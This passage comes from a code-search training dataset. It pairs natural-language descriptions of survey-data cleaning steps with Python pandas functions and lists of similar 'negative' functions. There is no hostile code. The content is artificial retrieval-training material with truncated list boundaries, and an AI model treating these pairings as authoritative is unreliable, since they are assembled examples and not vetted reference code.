"def add_wiktionary(self, row):\n g = self.g\n word = row['word']\n lang = row['lang']\n if lang is None:\n return\n senses = row['senses']\n pos = row['pos']\n noun_forms = row['noun_forms']\n adj_forms = row['adj_forms']\n verb_forms = row['verb_forms']\n\n word_id = self.hash(word, pos)\n lexeme_id = kgl[word_id]\n if not self.is_in_graph(word_id):\n _pos = self.link_pos(pos)\n if(_pos == None):\n print(f\"pos {pos} for word {word} not recognized, this entry will be ignored\")\n return\n\n g.add((lexeme_id, namespaces['rdf'].type, kgl.Lexeme))\n g.add((lexeme_id, pos_link, self.link_pos(pos)))\n g.add((lexeme_id, kgl_label, Literal(word, lang=\"en\")))\n g.add((lexeme_id, rdfs_label, Literal(word, lang=\"en\")))\n g.add((lexeme_id, namespaces['dct'].language, namespaces['dct'][lang]))\n g.add((lexeme_id, kgl_prop['language'], kgl[lang]))\n\n\n # Detect collision by just looking at the word label.\n # In theory we should also check that different pos may cause a collision\n # but it looks extremely unlikely\n # Unless the word has doubled entries. On that case, we ignore the problem (TODO)\n else:\n label = g.label(word_id)\n if label != word:\n print(f\"Detected collision between {label} and {word}\")\n word_id = self.hash(word + \"$42\", pos)\n lexeme_id = kgl[word_id]\n g.add((lexeme_id, pos_link, kgl[pos]))\n g.add((lexeme_id, kgl_prop.label, Literal(word, lang=\"en\")))\n g.add((lexeme_id, namespaces['rdfs'].label, Literal(word, lang=\"en\")))\n\n if row['senses']:\n self.add_sense_rec(row['senses'], word_id, lexeme_id)\n\n # Nouns\n if noun_forms:\n self.add_noun_forms(word, word_id, lexeme_id, noun_forms)\n\n # Adjectives\n if adj_forms:\n self.add_adj_forms(word, word_id, lexeme_id, adj_forms)\n\n # Verbs\n if verb_forms:\n self.add_verb_forms(word, word_id, lexeme_id, verb_forms)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
If a column has no values at all (all NaN), the column is removed to avoid problems later in the analysis
|
def remove_empty_column(self, df):
return df.dropna(axis=1, how='all')
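
A minimal sketch of the behaviour described above, using a hypothetical toy DataFrame (the column names 'q1', 'q2', 'q3' are illustrative and not part of the survey data):

import numpy as np
import pandas as pd

# One completely empty column ('q2'); the others each have at least one value.
df = pd.DataFrame({
    'q1': [1, 2, np.nan],
    'q2': [np.nan, np.nan, np.nan],
    'q3': ['a', None, 'c'],
})

# dropna(axis=1, how='all') only removes columns where every value is NaN.
cleaned = df.dropna(axis=1, how='all')
print(list(cleaned.columns))  # ['q1', 'q3']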
|
[
"def drop_nan(df, col='mrn'):\n return df[pd.notnull(df[col])]",
"def remove_nan_and_zeroes_from_columns(df, variable):\n filtered_df = df[(df[variable].notnull()) & (df[variable]>0)]\n return filtered_df",
"def del_missings(data_frame):\n data_frame = data_frame.replace('unknown', np.nan).dropna(how='any')\n\n return data_frame",
"def remove_nan_and_zeroes_from_columns(df, variable):\n filtered_df = df[(df[variable].notnull()) & (df[variable]>0)]\n \n return filtered_df",
"def drop_missing_value(df, axis=0):\r\n reduced_df = df.dropna(axis=axis)\r\n return reduced_df",
"def drop_missing_value(dataframe):\n all_missing = []\n for col in dataframe.columns:\n if len(dataframe[col].unique()) == 1 and np.isnan(dataframe[col].unique()[0]):\n all_missing.append(col)\n\n # drop columns with all missing data\n dataframe = dataframe.drop(all_missing, inplace=False, axis=1)\n return dataframe, all_missing",
"def dropping_empty_question(self, df):\n return self.df.dropna(axis=1, how='all')",
"def delete_empty_cols(self) -> pd.DataFrame:\n full_cols = []\n for col in self.dataframe.columns:\n if self.dataframe[col].isnull().sum() / len(self.dataframe) \\\n < config.BAD_FULLNESS_RATE:\n full_cols.append(col)\n print('data_cleaning.py: Delete empty cols...')\n self.dataframe = self.dataframe[full_cols]\n return self.dataframe",
"def clean_data(dataframe):\n dataframe[dataframe.isnull()] = np.NaN\n dataframe = dataframe.dropna(subset=['connective_positions', 'sentences'])\n return dataframe",
"def get_columns_without_missing_values(self): #df dataframe\n missing_df = self.get_count_of_missing_values()\n clean_data = missing_df[missing_df[0] == 0]\n return clean_data",
"def clean_nan(df: pd.DataFrame) -> pd.DataFrame:\n return df.replace({np.nan: None})",
"def handle_NaN_values(self, df: pd.DataFrame) -> pd.DataFrame:\n ##### YOUR CODE GOES HERE #####\n pass",
"def remove_nas(\n df,\n cols_to_remove_nas=[\n \"Issue time\",\n \"Issue Date\",\n \"Latitude\",\n \"Longitude\",\n \"Location\",\n ],\n):\n for col in cols_to_remove_nas:\n df = df.loc[df[col].isna() == False]\n return df",
"def pruneNullRows(df):\n return df.dropna(axis=0, how='all')",
"def dropNaN(self, df):\n\n if isinstance(df, (pd.DataFrame, pd.Series)):\n df = df.dropna()\n else:\n pass\n return df",
"def rule_remove_blank_rows(self, data):\n if data.empty:\n return data\n\n data.dropna(axis=0, how='all', inplace=True)\n\n return data",
"def test_no_nans(self):\n self.assertTrue(read_dataframe().isnull().values.any(), \"There are NaNs!\")",
"def convert_to_none(df: pd.DataFrame) -> pd.DataFrame:\n if df.isnull().any().any():\n converted_df = df.replace(np.nan, None)\n return converted_df\n else:\n return df",
"def drop_na(self, *colnames):\n drop = Vector.fast([False], bool).repeat(self.nrow)\n for colname in colnames:\n drop = drop | self[colname].is_na()\n return self.filter_out(drop)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Remove the rows that do not correspond to the appropriate country
|
def remove_not_right_country(self, df):
    # Use the pycountry package to get the country name from the country code
if len(self.country) == 2:
if self.country == 'uk':
country = pycountry.countries.get(alpha_2='GB'.upper())
else:
country = pycountry.countries.get(alpha_2=self.country.upper())
elif len(self.country) == 3:
country = pycountry.countries.get(alpha_3=self.country.upper())
elif len(self.country) == 4:
country = pycountry.countries.get(alpha_4=self.country.upper())
    else:
        raise ValueError(f'Unexpected country code length: {self.country}')
return df[df['socio1. In which country do you work?'] == country.name]
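
A minimal usage sketch of the country lookup, assuming the pycountry package is installed; the answer values in the toy DataFrame are hypothetical:

import pandas as pd
import pycountry

# Toy answers column; the column label mirrors the one used in the method above.
df = pd.DataFrame({'socio1. In which country do you work?':
                   ['United Kingdom', 'Germany', 'United Kingdom']})

# Same lookup as the two-letter branch above, with 'uk' mapped to the ISO code 'GB'.
country = pycountry.countries.get(alpha_2='GB')
print(country.name)  # 'United Kingdom'
print(df[df['socio1. In which country do you work?'] == country.name])  # keeps the two UK rows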
|
[
"def filtercountry(df, country):\n mask = df.country.eq(country)\n return df[mask]",
"def iatas_without_country():\n codes_w_country = []\n for v in IATAS_BY_COUNTRIES.values():\n codes_w_country += v\n\n if not len(codes_w_country) == len(set(codes_w_country)):\n print(f\"Total codes ({len(codes_w_country)}) - codes with a country ({len(set(codes_w_country))}) = \"\n f\"{len(codes_w_country) - len(set(codes_w_country))}, please check for double assignment: \", end=\"\")\n print([x for x in codes_w_country if codes_w_country.count(x) > 1])\n\n with open(\"./data/flight_data.csv\", 'r') as file: # open as simple text file\n lines = file.read().splitlines()\n all_codes_in_flts = list()\n for line in lines:\n if line.split(\",\")[7] not in all_codes_in_flts: # iata codes is in 8th position of every line\n all_codes_in_flts.append(line.split(\",\")[7])\n del (all_codes_in_flts[0]) # delete header entry of 8th position\n assigned = [c for c in all_codes_in_flts if c in codes_w_country] # iatas with country\n not_assigned = [c for c in all_codes_in_flts if c not in codes_w_country] # iatas without country\n\n if len(all_codes_in_flts) - len(assigned) == 0:\n return None\n else:\n return not_assigned",
"def filter_data(self):\n self.remove_rows(self.earnings_yield, 0)\n self.remove_rows(self.ret_on_capital, 0)\n self.remove_rows(\"Liq.2meses\", 0)",
"def _feature_country_process(self):\n if 'Country' not in self.df_invoice.columns:\n return\n\n list_countries_keep = ['United Kingdom']\n rows_before = self.df_invoice.shape[0]\n \n df_invoice_new = pd.DataFrame()\n for country in list_countries_keep : \n df_invoice_new = df_invoice_new.append(\\\n self._df_invoice[self.df_invoice['Country']==country]\\\n , ignore_index=True)\n\n self.df_invoice = df_invoice_new\n del(df_invoice_new)\n \n rows_after = self._df_invoice.shape[0] \n P5_SegmentClassifier.print_stat_rows(\"Countries filtering : \"\\\n , rows_before, rows_after)\n\n \n #-------------------------------------------------------------------------\n # Due to the fact only one country is used, then this feature is dropped\n #-------------------------------------------------------------------------\n list_col_to_keep = [col for col in self._df_invoice.columns \\\n if col not in 'Country']\n \n self._df_invoice = self._df_invoice[list_col_to_keep] \n\n return",
"def _filter_by_country(self):\n df = self.fdf[self.fdf['Protocol ID'].str.startswith(self.country) == True].copy()\n\n return df",
"def get_countries_cleansed(self,dfcountries):\n dfcountries.createOrReplaceTempView(\"Countries\")\n cl_dfcountries=self.spark.sql(\"\"\"\n select code as country_code,country_name,case when country_name like '%INVALID%' or country_name like '%Collapsed%' or country_name like '%No Country Code%' then 'INVALID'\n else 'VALID' end country_status from Countries c \n \"\"\")\n \n return cl_dfcountries",
"def _filter_countries(data, map=False):\n #headers = data[0].keys()\n headers = ['name', 'region', 'adminregion', 'iso2Code', 'capitalCity', u'longitude',\n 'latitude', 'incomeLevel', 'id', 'lendingType']\n results = [headers]\n for row in data:\n if not _is_country(row['iso2Code']):\n #TODO: remove them from the cache\n continue\n if map:\n results.append([_country_conversion_map(i, row[i]) for i in headers])\n else:\n results.append([row[i] for i in headers])\n return results",
"def _filter_by_country(self):\n df = self.fdf[self.fdf['Protocol ID'].str.startswith(self.country) == True]\n\n return df",
"def keep_countries_and_all(data, country_list):\n data_all = data.withColumn('country', F.lit('All'))\n\n if country_list is not None:\n data_countries = data.filter(F.col('country').isin(country_list))\n data_all = data_all.union(data_countries)\n\n return data_all",
"def filtermeasures(df, country):\n mask = ~df[country].isna()\n return df[['date', country]][mask]",
"def get_unique_countries():\n\n return set(TABLE_BETS['country'].unique())",
"def filter_country(self, update, context):\r\n \r\n pass",
"def delete_country_entry(self,country_keys):\n if self.db_connected:\n self.delete_country_data(country_keys)\n for country in country_keys:\n self.cur.execute(\"DELETE FROM countries WHERE key = :key\", {\"key\":country})",
"def drop_unwanted_data(row):\n if not row[\"PatientDOB\"]:\n raise StopProcessing()\n if row[\"SpecialtyCode\"] not in [\"600\", \"180\"]:\n raise StopProcessing()",
"def list_of_countries(country_data: List[CountryTemperature], year: int) -> set:\r\n return {row.country for row in country_data if int(row.date.strftime(\"%Y\")) > year and row.temperature is not None}",
"def remove_country():\n\n name=request.get_data().decode().split('=')[1]\n result = json.loads(dumps(db.getInstance().delete_country_by_name(name)))\n return result",
"def _subset_by_area(self, country, province):\n df = self._cleaned_df.copy()\n return df.loc[(df[self.COUNTRY] == country) & (df[self.PROVINCE] == province)]",
"def remove_non_en(tmdb_movies_df):\n\n tmdb_movies_df = tmdb_movies_df[tmdb_movies_df['original_language'] == 'en']\n \n return tmdb_movies_df",
"def filter_loans(df, exclude_by_country):\n loans_mask = False\n for country,loans in exclude_by_country.iteritems():\n loans_mask |= ((df.dwh_country_id==country) & ~(df.fk_loan.isin(loans)))\n return df[loans_mask]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Use the option `section_nbr_to_keep_after` set up in the config file to know which section is considered as proof that the participant dropped out and did not reply. It uses the label `Last page` to know which last page the participant reached
|
def dropping_dead_participant(self, df):
    return self.df.loc[self.df['lastpage. Last page'] > self.section_nbr_to_keep_after]
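
A small illustrative sketch of the same filter; the data and the threshold value are assumptions, only the column label is taken from the method above:

import pandas as pd

df = pd.DataFrame({'lastpage. Last page': [1, 4, 7, 9]})
section_nbr_to_keep_after = 5  # assumed value read from the config file

# Keep only the participants who went past the configured section.
kept = df.loc[df['lastpage. Last page'] > section_nbr_to_keep_after]
print(kept)  # rows with last page 7 and 9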
|
[
"def exit_last_section() -> None:\n ContextPrinter.self.headers = ContextPrinter.self.headers[:-1]",
"def __goToLastPage(self):\n try:\n pagination_tag = self.soup.find('div', 'pagenav')\n if not pagination_tag:\n return\n uri = None\n last_page_tag = pagination_tag.find('a', title=re.compile('Last Page'))\n if last_page_tag:\n uri = last_page_tag['href']\n else:\n last_page_tag = pagination_tag.findAll('a', href=True, text=re.compile('^\\d+$'))\n if last_page_tag:\n uri = last_page_tag[-1].parent['href']\n if not uri:\n log.info(self.log_msg('Post found in only one page'))\n return\n data_dict = dict(parse_qsl(uri.split('?')[-1]))\n if 's' in data_dict.keys():\n data_dict.pop('s')\n self.currenturi = self.__baseuri + 'showthread.php?'+ urlencode(data_dict)\n self.__setSoupForCurrentUri()\n except:\n log.info(self.log_msg('Last page cannot find from the given page no \\\n for url %s'%self.task.instance_data['uri']))",
"def last_people_exit(self, n):\n for k in range(n):\n self.listPeople.remove(self.listPeople[len(self.listPeople) - (k + 1)])\n self.people = self.people - 1",
"def _walk_section(self,sec,endsec,path,lastlead,sections):\n \n sname = sec.heading.lower() if hasattr(sec,\"heading\") else \"first\"\n cbs = list(filter(lambda x: isinstance(x,ChoiceBlock), sec.items))\n found_valid = False\n \n # end section is itself a valid path\n # (at this point we assume it falls through)\n if sec is endsec:\n found_valid = True\n\n # only the end section may be choiceless\n if len(cbs)==0 and sec is not endsec:\n raise ValidationError(('Section \"%s\" has no choice blocks and so '\n +'cannot reach end of document') % sname)\n\n # iterate over choice blocks\n for b in cbs:\n \n last_block = b is cbs[-1]\n gcs = list(filter(lambda c: c.goto is not None, b.choices))\n \n # iterate over choices with gotos\n for c in gcs:\n \n last_goto = last_block and c is gcs[-1]\n target = sections[c.goto.lower()]\n newpath = path+[sec]\n newlastlead = ( len(newpath)-1 \n if found_valid or not last_goto else lastlead )\n \n # Is target a loop?\n if target in newpath:\n # must be potential exit following the section\n if newlastlead==-1 or newlastlead < newpath.index(target):\n raise ValidationError('Dead-end loop found in section \"%s\"' % sname) \n else:\n # Recurse to target section\n if self._walk_section(target,endsec,newpath,\n newlastlead,sections):\n found_valid = True\n \n # if block doesnt fall through, stop\n if not any([c.goto is None for c in b.choices]):\n # End section *must* fall all the way through\n if sec is endsec:\n raise ValidationError(('End section \"%s\" has no '\n +'choices that reach end of document') % sname)\n break\n else:\n # Fell through last block\n # Only the end section may fall through\n if sec is not endsec:\n raise ValidationError(('Section \"%s\" has one or more '\n +'choices that reach end of section and so never '\n +'reach end of document') % sname)\n \n return found_valid",
"def select_last_restart( self ):\n if self.has_kw(\"SEQNUM\"):\n self.select_restart_section( index = self.num_report_steps() - 1)\n return True\n else:\n return False",
"def previous(self, start): # 'start' is the index of the first record of current page\r\n if start < 5: # if the first index is less than 5\r\n tk.messagebox.showerror('Alert', 'This is the first page.')\r\n else:\r\n self.destroy_frame()\r\n self.start = start - 5 # index of first record of previous page = index of first record of current page - 5\r\n for i in range(5): # the 'previous' page can only display 5 records\r\n self.label_record(self.start, i)\r\n self.num = self.num + 5 # the number of records 'after' the current page to be displayed is (self.num+5)\r",
"def on_section_completed(self, prevsection, len_sections):\n self.emit(\"section_completed\", prevsection, len_sections)",
"def page_down():\r\n global currentpage, pagecount\r\n\r\n currentpage += 1\r\n topic0.config(state=NORMAL, relief=RAISED)\r\n\r\n v.set(str(currentpage))",
"def find_section_text(lines, section, go_to_end=False, section2=\"\"):\n if len(lines) == 0:\n return \"\"\n n = 0\n for line in lines:\n line_mod = line.replace(\" \", \"\")\n if line_mod.startswith(\"==%s\" % section) \\\n or (section2 != \"\" and line_mod.startswith(\"==%s\" % section2)):\n # Section started\n n += 1\n doc = \"\"\n # collect the documents till next section or the end \n newline = lines[n]\n while (go_to_end or not newline.strip().startswith('==')) \\\n and not newline.strip().startswith('[[Category'):\n doc += newline + '\\n'\n n += 1\n if n < len(lines):\n newline = lines[n]\n else:\n break\n return doc\n n += 1\n \n return \"\"",
"def PartnersLast(auction):\n try:\n bid = auction[len(auction) - 2]\n except Exception:\n bid = None\n return bid",
"def test_no_sections_with_footer(self):\n text = 'text\\n\\n[[Category:A]]'\n result = extract_sections(text, self.site)\n self._extract_sections_tests(result, 'text\\n\\n', [], '[[Category:A]]')",
"def n_sessions_until_conclusion(self):\n return max(0, self.seg_prob.details.min_results_per_assignment -\\\n self.n_sessions_w_result)",
"def _default_after(request_params, _result):\n request_params['offset'] += request_params['limit']",
"def parse_section(outputfile, nmo, energies, occupations, orbitals, has_beta):\n alpha, beta = 0, 1\n # Skip the dashes and the threshold for printing.\n next(outputfile)\n next(outputfile)\n # \"SPIN UP\"\n if has_beta:\n # Blank line only for unrestricted calculations.\n next(outputfile)\n parse_block(outputfile, nmo, energies, occupations, orbitals, alpha)\n # \"SPIN DOWN\"\n next(outputfile)\n if has_beta:\n parse_block(outputfile, nmo, energies, occupations, orbitals, beta)",
"def check_detail(self,config,name_count,sections_list,detail_flag):\n def _check_detail(group,item):\n handler_name_dict = self._heart_beat_config[\"handler_name_dict\"]\n item_class_name = None\n item_concurrency_name = None\n item_section_name = None\n for name in handler_name_dict:\n if item.startswith(name):\n item_class_name = handler_name_dict[name][0]\n item_concurrency_name = handler_name_dict[name][1]\n item_section_name = name\n break\n if item_class_name is not None and item_concurrency_name is not None:\n item_ip = config[item].get('ip')\n item_concurrency = config[item].get(item_concurrency_name,'')\n if len(item_concurrency) == 0:\n group_id = len(group)+1\n group[group_id] = {}\n group[group_id][\"text\"] = 'cfg file\\'s section %s lack the concurrency %s please repair it'%(item_section_name,item_concurrency_name)\n else:\n item_concurrency = int(item_concurrency)\n if item_class_name in name_count and item_ip in name_count[item_class_name]:\n if detail_flag =='detail' and len(name_count[item_class_name][item_ip]) < item_concurrency:\n group_id = len(group)+1\n group[group_id] = {}\n group[group_id][\"text\"] = 'the handler %s in %s should have %s concurrency but now only %s left'%(item_class_name,item_ip,item_concurrency,len(name_count[item_class_name][item_ip]))\n group[group_id][\"class_name\"] = item_class_name\n group[group_id][\"server_ip\"] = item_ip\n group[group_id][\"expected_concurrency\"] = item_concurrency\n group[group_id][\"actual_concurrency\"] = len(name_count[item_class_name][item_ip])\n\n elif item_concurrency >0:#if statistic is nothing but cfg expect someone ,add one record\n group_id = len(group)+1\n group[group_id] = {}\n group[group_id][\"text\"] = 'the handler %s in %s should have %s concurrency but now only %s left'%(item_class_name,item_ip,item_concurrency,0)\n group[group_id][\"class_name\"] = item_class_name\n group[group_id][\"server_ip\"] = item_ip\n group[group_id][\"expected_concurrency\"] = item_concurrency\n group[group_id][\"actual_concurrency\"] = 0\n else:\n pass\n return group\n return reduce(_check_detail, sections_list,{})",
"def test_with_section_no_footer(self):\n text = ('text\\n\\n'\n '==title==\\n'\n 'content')\n result = extract_sections(text, self.site)\n self._extract_sections_tests(\n result, 'text\\n\\n', [('==title==', '\\ncontent')])",
"def _versioned_datastore_after(request_params, result):\n request_params['after'] = result['after']",
"def get_next_assessment_sections(self, n):\n return # osid.assessment.AssessmentSection",
"def isPresent(notes, section):\n if len([note for note in notes if note['time'] > section[0] \\\n and note['time'] < section[1]]) > 0:\n return True\n else:\n return False"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Some questions may not have any answers. If the unique value of such a question is array([nan]), the question is dropped
|
def dropping_empty_question(self, df):
return self.df.dropna(axis=1, how='all')
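
An illustrative check of the condition described above; the column names 'answered' and 'unanswered' are hypothetical:

import numpy as np
import pandas as pd

# 'unanswered' mimics a question that nobody replied to.
df = pd.DataFrame({'answered': [1.0, np.nan, 3.0],
                   'unanswered': [np.nan, np.nan, np.nan]})

print(df['unanswered'].unique())           # array([nan]) -> no answer at all
print(list(df.dropna(axis=1, how='all')))  # ['answered'] -> the empty question is gone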
|
[
"def test_nans_replaced():\n a = rem.fix_missing()\n new_list = [x for sublist in a for x in sublist]\n unique_vals = set(new_list)\n try:\n None not in unique_vals\n '?' in unique_vals\n print \"NaNs removed, matrix has appropriate missing data symbols.\"\n except:\n raise TypeError, \"\"\"There are NoneType characters in this array, which \n RAxML cannot handle. Please check that there are no \n non-numeric characters in your input matrix.\"\"\"",
"def unanswered(self):\n return self.filter_by(answer=None)",
"def remove_nans(dataset):\n return dataset.fillna(0.0)",
"def avoid_nans_to_visualize(self, points: np.ndarray):\n if points is None:\n return None\n if np.isnan(points).any():\n if len(points[~ np.isnan(points)]) == 0:\n points = None\n else:\n points = points[~ np.isnan(points)]\n return points",
"def clean(self, X):\n idx = np.where(np.isnan(X))[0]\n if len(idx) > 0:\n print('removed {} nans'.format(len(idx)))\n X[np.isnan(X)] = 0\n return(X)",
"def pop_nan(self, dct):\n res = dict(dct)\n nans = valfilter(\n lambda x: (\n x is None or str(x).strip() == '' or\n (isinstance(x, (Decimal, float)) and isnan(x))), res)\n return dissoc(res, *nans.keys())",
"def test_sesgo_not_nan(self, df):\n self.assertFalse(df.isnull().values.any(), note=\"Las métricas de sesgo e inequidad contienen nulos\")",
"def test_no_nans(self):\n self.assertTrue(read_dataframe().isnull().values.any(), \"There are NaNs!\")",
"def deleteNoneWantedData(tX, percentFactor) :\n columnToSuppress = []\n columnTreshold = len(tX) * percentFactor\n\n for column in range(len(tX[0])) :\n columnCounter = 0\n for row in range(len(tX)) :\n if tX[row][column] == -999.0 :\n columnCounter += 1\n if columnCounter > columnTreshold :\n columnToSuppress.append(column)\n break\n\n newTX = []\n for row in tX :\n newRow = np.delete(row, columnToSuppress)\n newTX.append(newRow)\n\n\t\n return np.array(newTX)",
"def x_are_none():\n list_x = []\n for k in Term.values.keys():\n if Term.values[k] is None:\n list_x.append(k)\n return list_x",
"def test_nones(self):\n none_indexes = [1, 5, 8]\n\n # Try Nones in y_data first\n x_data, y_data = self.gen_data()\n expected_len = len(y_data) - len(none_indexes)\n values_to_be_cut = [x_data[i] for i in none_indexes]\n for i in none_indexes:\n y_data[i] = None\n line = functions.FittedLine(x_data, y_data)\n self.assertTrue(len(line.x_data) == expected_len)\n self.assertTrue(len(line.y_data) == expected_len)\n for data in values_to_be_cut:\n self.assertTrue(data not in line.x_data)\n self.assertTrue(None not in line.y_data)\n\n # Try Nones in x_data next\n x_data, y_data = self.gen_data()\n expected_len = len(y_data) - len(none_indexes)\n values_to_be_cut = [y_data[i] for i in none_indexes]\n for i in none_indexes:\n x_data[i] = None\n line = functions.FittedLine(x_data, y_data)\n self.assertTrue(len(line.x_data) == expected_len)\n self.assertTrue(len(line.y_data) == expected_len)\n for data in values_to_be_cut:\n self.assertTrue(data not in line.y_data)\n self.assertTrue(None not in line.x_data)\n\n # Try Nones in both\n x_data, y_data = self.gen_data()\n x_none_indexes = [1, 2]\n y_none_indexes = [3, 4]\n none_indexes = set(x_none_indexes).union(y_none_indexes)\n expected_len = len(x_data) - len(none_indexes)\n x_cut_values = []\n for i in x_none_indexes:\n x_cut_values.append(x_data[i])\n x_data[i] = None\n y_cut_values = []\n for i in y_none_indexes:\n y_cut_values.append(y_data[i])\n y_data[i] = None\n line = functions.FittedLine(x_data, y_data)\n self.assertTrue(len(line.x_data) == expected_len)\n self.assertTrue(None not in line.x_data)\n self.assertTrue(len(line.y_data) == expected_len)\n self.assertTrue(None not in line.y_data)\n for v in x_cut_values:\n self.assertTrue(v not in line.x_data)\n for v in y_cut_values:\n self.assertTrue(v not in line.y_data)",
"def test_dropna_samples(self, feature_values, feature_data):\n\n sample_data = pd.DataFrame(\n {\n 'phenotype': ['sensitive', None, None, 'resistant']\n },\n index=['s1', 's2', 's3', 's4'])\n\n matrix = AnnotatedMatrix(\n feature_values, sample_data=sample_data, feature_data=feature_data)\n\n matrix = matrix.dropna_samples()\n\n assert list(matrix.columns) == ['s1', 's4']\n assert list(matrix.sample_data.index) == ['s1', 's4']",
"def notna(self) -> npt.NDArray[np.bool_]:\n return ~self.isna()",
"def nullify_empty_answers(self, data, many):\n def nullify_if_necessary(data):\n if not data['answers']:\n data['answers'] = None\n\n if not many:\n nullify_if_necessary(data)\n else:\n map(nullify_if_necessary, data)\n return data",
"def removeIncompleteData(self):\n\n for _key in self.data.keys():\n self.data[_key] = self.data[_key].replace(0, np.NaN)\n self.data[_key] = self.data[_key].dropna(subset=['NW_M', 'NW_X', 'TV_M', 'TV_X', 'UV_M', 'UV_X'])",
"def nan(self, x):\n return math.isnan(x)",
"def test_NaN_in_x():\n\n # Generate a low-pass filtered signal with NaNs\n x = np.random.randn(10000)\n Fs = 1000\n x = neurodsp.filter(x, Fs, 'lowpass', f_lo=50)\n\n # Compute phase, amp, and freq time series\n f_range = (4, 8)\n pha = neurodsp.phase_by_time(x, Fs, f_range)\n amp = neurodsp.amp_by_time(x, Fs, f_range)\n i_f = neurodsp.freq_by_time(x, Fs, f_range)\n\n assert len(pha[~np.isnan(pha)]) > 0\n assert len(amp[~np.isnan(amp)]) > 0\n assert len(i_f[~np.isnan(i_f)]) > 0",
"def isnan(quat):\n if math.isnan(quat.s) or math.isnan(quat.v[0,0]) or math.isnan(quat.v[0,1]) or math.isnan(quat.v[0,2]):\n return True\n else:\n return False",
"def discard_invalid_trials(dat):\n\n if 'time_invalid' in dat.columns:\n mask = ((dat['eye_invalid'] != 1) | (_np.isnan(dat['eye_invalid'])) &\n (dat['time_invalid'] != 1))\n else:\n mask = (dat['eye_invalid'] != 1) | (_np.isnan(dat['eye_invalid']))\n\n dat = dat.loc[mask, :]\n return(dat)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Various cleaning of white spaces in column names. This function can be extended if other forms of errors are found later
|
def cleaning_columns_white_space(self, df):
return df.rename(columns=lambda x: self.cleaning_some_white_space(x))
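
A minimal sketch of the renaming pattern, with a hypothetical stand-in for the cleaning_some_white_space helper, which is not shown in this file:

import pandas as pd

def cleaning_some_white_space(name):
    # Hypothetical stand-in: strip the ends and collapse internal runs of
    # whitespace into single spaces.
    return ' '.join(name.split())

df = pd.DataFrame(columns=['  socio1. In which country  do you work? '])
cleaned = df.rename(columns=lambda x: cleaning_some_white_space(x))
print(list(cleaned.columns))  # ['socio1. In which country do you work?']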
|
[
"def tidy_data(df):\n\n ##clean up column headings\n df.columns = df.columns.str.strip().str.lower().str.replace(' ', '_').str.replace('(', '').str.replace(')', '')",
"def clean_cols(data):\n clean_col_map = {x: x.lower().strip() for x in list(data)}\n return data.rename(index=str, columns=clean_col_map)",
"def clean_column_name(name: str) -> str:\n essential_chars = set(string.ascii_letters + string.digits + \"_\")\n name_no_spaces = \"_\".join(name.split())\n\n return \"\".join(filter(lambda char: char in set(essential_chars), name_no_spaces))",
"def preprocess_df_headers(dataframe: pd.DataFrame):\n dataframe.columns = dataframe.columns.str.strip()\n dataframe.columns = dataframe.columns.str.replace(\" \", \"_\")\n dataframe.columns = dataframe.columns.str.replace(\"#\", \"NUM\")\n dataframe.columns = dataframe.columns.str.replace(\"/\", \"_\")\n dataframe.replace('', np.nan, inplace=True)",
"def clean_column_names(df):\r\n columns = df.columns\r\n colupdated = []\r\n for col in columns:\r\n removespecialchars = col.translate({ord(c): \"\" for c in \"!@#$%^&*()[]{};:,. /<>?\\|`~-=_+'\"})\r\n colupdated.append(removespecialchars)\r\n df.columns = colupdated\r\n return df",
"def _clean_column_names(self):\n self.logger.info(\"Set up column name cleaning.\")\n self.pipeline.steps.append(\n (\"clean_column_names\", TransformerWrapper(CleanColumnNames()))\n )",
"def __clean_prefix(df, col, taboo_word): # @vaihauWILIAMU\n df = __drop_redundancy(df, col, taboo_word) \n return df",
"def _validate_column_names(df):\n to_rename = {}\n for column in df:\n if '.' in column:\n to_rename[column] = column.replace('.', '')\n return df.rename(columns=to_rename)",
"def _standardize_column_values(dataframe):\n\n # TODO Use None instead of \"-\"; but may affect downstream pipelines that use \"-\" already\n if \"structure.alternate_model\" in dataframe.columns:\n dataframe[\"structure.alternate_model\"].replace(\"\", \"-\", inplace=True)\n if \"ligand.expo_id\" in dataframe.columns:\n dataframe[\"ligand.expo_id\"].replace(0, \"-\", inplace=True)\n if \"ligand_allosteric.expo_id\" in dataframe.columns:\n dataframe[\"ligand_allosteric.expo_id\"].replace(0, \"-\", inplace=True)\n if \"structure.resolution\" in dataframe.columns:\n dataframe[\"structure.resolution\"].replace(0, np.nan, inplace=True)\n\n # In case of drugs\n if \"drug.brand_name\" in dataframe.columns:\n dataframe[\"drug.brand_name\"] = dataframe[\"drug.brand_name\"].apply(\n lambda x: x.split(\";\") if x != \"\" else []\n )\n if \"drug.synonyms\" in dataframe.columns:\n dataframe[\"drug.synonyms\"] = dataframe[\"drug.synonyms\"].apply(\n lambda x: x.split(\"\\t\") if x != \"\" else []\n )\n\n return dataframe",
"def format_column_name(c):\n return c.replace(\"-\", \"_\").replace(\"(\", \"\").replace(\")\", \"\")\\\n .replace(\" \", \"_\").lower()",
"def clean_entries(entry):\n \n # convert None and NaN to an empty string. This allows simple string concatenation\n if pd.isnull(entry):\n entry = ''\n \n # convert to string, lowercase, and strip leading and trailing whitespace\n entry = str(entry).lower().strip()\n \n # cut down (internal) consecutive whitespaces to one white space\n entry = re.sub(r'\\s+', ' ', entry)\n \n return entry",
"def normalize_column_names(df: DataFrame) -> DataFrame:\n list_new_names = []\n for col in df.columns:\n new_name = col.strip()\n new_name = new_name.replace(\" \", \"\")\n new_name = new_name.replace(\".\", \"_\")\n new_name = new_name.lower()\n list_new_names.append(new_name)\n df = df.toDF(*list_new_names)\n return df",
"def stripCols(self):\n for frame in self.files.values():\n for col in frame.columns:\n frame[col] = frame[col].str.strip()",
"def trim_all_columns(df):\r\n trim_strings = lambda x: x.strip() if isinstance(x, str) else x\r\n return df.applymap(trim_strings)",
"def _pre_wrap_with_ascii_replace(self, colname, datatype):\n pass",
